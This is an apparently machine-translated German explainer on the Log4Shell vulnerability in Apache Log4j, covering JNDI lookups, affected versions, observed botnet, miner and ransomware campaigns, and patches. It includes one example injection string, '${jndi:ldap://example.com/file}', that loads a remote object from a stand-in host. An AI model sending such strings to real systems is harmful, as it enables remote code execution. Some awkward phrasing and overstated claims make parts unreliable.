Inhaltsverzeichnis[Ausblenden][Zeigen]
Ende November 2021 haben wir eine große Bedrohung für die Cybersicherheit aufgedeckt. Dieser Exploit würde potenziell Millionen von Computersystemen weltweit betreffen.
Dies ist ein Leitfaden zur Log4j-Schwachstelle und dazu, wie ein übersehener Designfehler über 90 % der weltweiten Computerdienste angreifbar machte.
Apache Log4j ist ein Java-basiertes Open-Source-Protokollierungsdienstprogramm, das von der Apache Software Foundation entwickelt wurde. Ursprünglich von Ceki Gülcü im Jahr 2001 geschrieben, ist es jetzt Teil von Apache Logging Services, einem Projekt der Apache Software Foundation.
Unternehmen auf der ganzen Welt nutzen die Log4j-Bibliothek, um die Protokollierung ihrer Anwendungen zu ermöglichen. Tatsächlich ist die Java-Bibliothek so allgegenwärtig, dass Sie sie in Anwendungen von Amazon, Microsoft, Google und anderen finden können.
Die Bekanntheit der Bibliothek bedeutet, dass jeder potenzielle Fehler im Code Millionen von Computern für Hackerangriffe anfällig machen könnte. Am 24. November 2021, a Cloud-Sicherheit Ein für Alibaba arbeitender Forscher entdeckte einen schrecklichen Fehler.
Die Log4j-Schwachstelle, auch bekannt als Log4Shell, existierte unbemerkt seit 2013. Die Schwachstelle ermöglichte es böswilligen Akteuren, Code auf betroffenen Systemen auszuführen, auf denen Log4j ausgeführt wird. Es wurde am 9. Dezember 2021 öffentlich bekannt gegeben
Branchenexperten nennen den Log4Shell-Fehler the größte Schwachstelle in der jüngsten Vergangenheit.
In der Woche nach der Veröffentlichung der Schwachstelle entdeckten Cybersicherheitsteams Millionen von Angriffen. Einige Forscher beobachteten sogar eine Rate von über hundert Angriffen pro Minute.
Wie funktioniert es?
Um zu verstehen, warum Log4Shell so gefährlich ist, müssen wir verstehen, wozu es fähig ist.
Die Log4Shell-Schwachstelle ermöglicht die Ausführung willkürlichen Codes, was im Grunde bedeutet, dass ein Angreifer jeden Befehl oder Code auf einem Zielcomputer ausführen kann.
Wie wird dies erreicht?
Zuerst müssen wir verstehen, was JNDI ist.
Das Java Naming and Directory Interface (JNDI) ist ein Java-Dienst, der es Java-Programmen ermöglicht, Daten und Ressourcen über einen Namen zu erkennen und nachzuschlagen. Diese Verzeichnisdienste sind wichtig, da sie einen organisierten Satz von Datensätzen bereitstellen, auf die Entwickler beim Erstellen von Anwendungen leicht zugreifen können.
Das JNDI kann verschiedene Protokolle verwenden, um auf ein bestimmtes Verzeichnis zuzugreifen. Eines dieser Protokolle ist das Lightweight Directory Access Protocol oder LDAP.
Wenn Sie eine Zeichenfolge protokollieren, log4j führt Zeichenfolgensubstitutionen durch, wenn sie auf Ausdrücke des Formulars stoßen ${prefix:name}
.
Zum Beispiel, Text: ${java:version}
möglicherweise als Text protokolliert: Java-Version 1.8.0_65. Diese Art von Substitutionen sind alltäglich.
Wir können auch Ausdrücke wie haben Text: ${jndi:ldap://example.com/file}
das das JNDI-System verwendet, um ein Java-Objekt von einer URL über das LDAP-Protokoll zu laden.
Dadurch werden die von dieser URL kommenden Daten effektiv in die Maschine geladen. Jeder potenzielle Hacker kann bösartigen Code auf einer öffentlichen URL hosten und darauf warten, dass Maschinen, die Log4j verwenden, ihn protokollieren.
Da der Inhalt von Protokollnachrichten benutzergesteuerte Daten enthält, können Hacker ihre eigenen JNDI-Referenzen einfügen, die auf von ihnen kontrollierte LDAP-Server verweisen. Diese LDAP-Server können voller bösartiger Java-Objekte sein, die JNDI durch die Schwachstelle ausführen kann.
Erschwerend kommt hinzu, dass es keine Rolle spielt, ob es sich bei der Anwendung um eine serverseitige oder eine clientseitige Anwendung handelt.
Solange es für den Logger eine Möglichkeit gibt, den bösartigen Code des Angreifers zu lesen, ist die Anwendung immer noch offen für Exploits.
Wer ist betroffen?
Die Schwachstelle betrifft alle Systeme und Dienste, die APache Log4j verwenden, mit den Versionen 2.0 bis einschließlich 2.14.1.
Mehrere Sicherheitsexperten weisen darauf hin, dass die Schwachstelle eine Reihe von Anwendungen betreffen kann, die Java verwenden.
Der Fehler wurde erstmals im Microsoft-eigenen Videospiel Minecraft entdeckt. Microsoft hat seine Benutzer aufgefordert, ihre Java-Edition der Minecraft-Software zu aktualisieren, um jegliches Risiko zu vermeiden.
Jen Easterly, Direktorin der Cybersecurity and Infrastructure Security Agency (CISA), sagt, dass Anbieter a Hauptverantwortung um zu verhindern, dass Endbenutzer von böswilligen Akteuren diese Schwachstelle ausnutzen.
„Anbieter sollten auch mit ihren Kunden kommunizieren, um sicherzustellen, dass Endbenutzer wissen, dass ihr Produkt diese Schwachstelle enthält, und Software-Updates priorisieren sollten.“
Berichten zufolge haben die Angriffe bereits begonnen. Symantec, ein Unternehmen, das Cybersicherheitssoftware anbietet, hat eine unterschiedliche Anzahl von Angriffsanfragen beobachtet.
Hier sind einige Beispiele für die Arten von Angriffen, die Forscher entdeckt haben:
- Botnetze
Botnets sind ein Netzwerk von Computern, die von einer einzigen angreifenden Partei kontrolliert werden. Sie helfen bei DDoS-Angriffen, Datendiebstahl und anderen Betrügereien. Forscher beobachteten das Muhstik-Botnet in Shell-Skripten, die aus dem Log4j-Exploit heruntergeladen wurden.
- XMRig Miner-Trojaner
XMRig ist ein Open-Source-Kryptowährungs-Miner, der CPUs verwendet, um das Monero-Token abzubauen. Cyberkriminelle können XMRig auf den Geräten von Personen installieren, damit diese ihre Rechenleistung ohne ihr Wissen nutzen können.
- Khonsari-Ransomware
Ransomware bezieht sich auf eine Form von Malware, die darauf ausgelegt ist Dateien verschlüsseln auf einem Computer. Angreifer können dann eine Zahlung verlangen, um wieder Zugriff auf die verschlüsselten Dateien zu erhalten. Forscher entdeckten die Ransomware Khonsari bei Log4Shell-Angriffen. Sie zielen auf Windows-Server ab und nutzen das .NET-Framework.
Was passiert als nächstes?
Experten gehen davon aus, dass es Monate oder vielleicht sogar Jahre dauern wird, bis das durch die Log4J-Schwachstelle verursachte Chaos vollständig behoben ist.
Bei diesem Vorgang wird jedes betroffene System mit einer gepatchten Version aktualisiert. Selbst wenn alle diese Systeme gepatcht sind, besteht immer noch die drohende Bedrohung durch mögliche Hintertüren, die Hacker möglicherweise bereits zu dem Fenster hinzugefügt haben, dass Server für Angriffe offen waren.
Viele Lösungen und Minderungen existieren, um zu verhindern, dass Anwendungen von diesem Fehler ausgenutzt werden. Die neue Log4j-Version 2.15.0-rc1 hat verschiedene Einstellungen geändert, um diese Schwachstelle zu mindern.
Alle Funktionen, die JNDI verwenden, werden standardmäßig deaktiviert, und Remote-Lookups wurden ebenfalls eingeschränkt. Das Deaktivieren der Suchfunktion in Ihrem Log4j-Setup trägt dazu bei, das Risiko möglicher Exploits zu verringern.
Außerhalb von Log4j besteht noch Bedarf an einem umfassenderen Plan, um Open-Source-Exploits zu verhindern.
Anfang Mai veröffentlichte das Weiße Haus eine oberster Befehl mit dem Ziel, die nationale Cybersicherheit zu verbessern. Es enthielt eine Bestimmung für eine Software-Stückliste (SBOM), die im Wesentlichen ein formelles Dokument war, das eine Liste aller zum Erstellen der Anwendung erforderlichen Elemente enthielt.
Dazu gehören Teile wie die Open-Source- Pakete, Abhängigkeiten und APIs, die für die Entwicklung verwendet werden. Obwohl die Idee von SBOMs für die Transparenz hilfreich ist, wird sie dem Verbraucher wirklich helfen?
Das Aktualisieren von Abhängigkeiten kann zu mühsam sein. Unternehmen können sich einfach dafür entscheiden, Bußgelder zu zahlen, anstatt zu riskieren, zusätzliche Zeit mit der Suche nach alternativen Paketen zu verschwenden. Vielleicht sind diese SBOMs nur nützlich, wenn ihre Umfang wird weiter eingeschränkt.
Zusammenfassung
Das Log4j-Problem ist mehr als nur ein technisches Problem für Organisationen.
Führungskräfte müssen sich der potenziellen Risiken bewusst sein, die auftreten können, wenn ihre Server, Produkte oder Dienste auf Code angewiesen sind, den sie selbst nicht pflegen.
Sich auf Open-Source- und Drittanbieteranwendungen zu verlassen, ist immer mit einem gewissen Risiko verbunden. Unternehmen sollten erwägen, Strategien zur Risikominderung auszuarbeiten, bevor neue Bedrohungen ans Licht kommen.
Ein Großteil des Internets basiert auf Open-Source-Software, die von Tausenden von Freiwilligen weltweit gepflegt wird.
Wenn wir das Internet an einem sicheren Ort halten wollen, sollten Regierungen und Unternehmen in die Finanzierung von Open-Source-Bemühungen und Cybersicherheitsagenturen wie z CISA.
Hinterlassen Sie uns einen Kommentar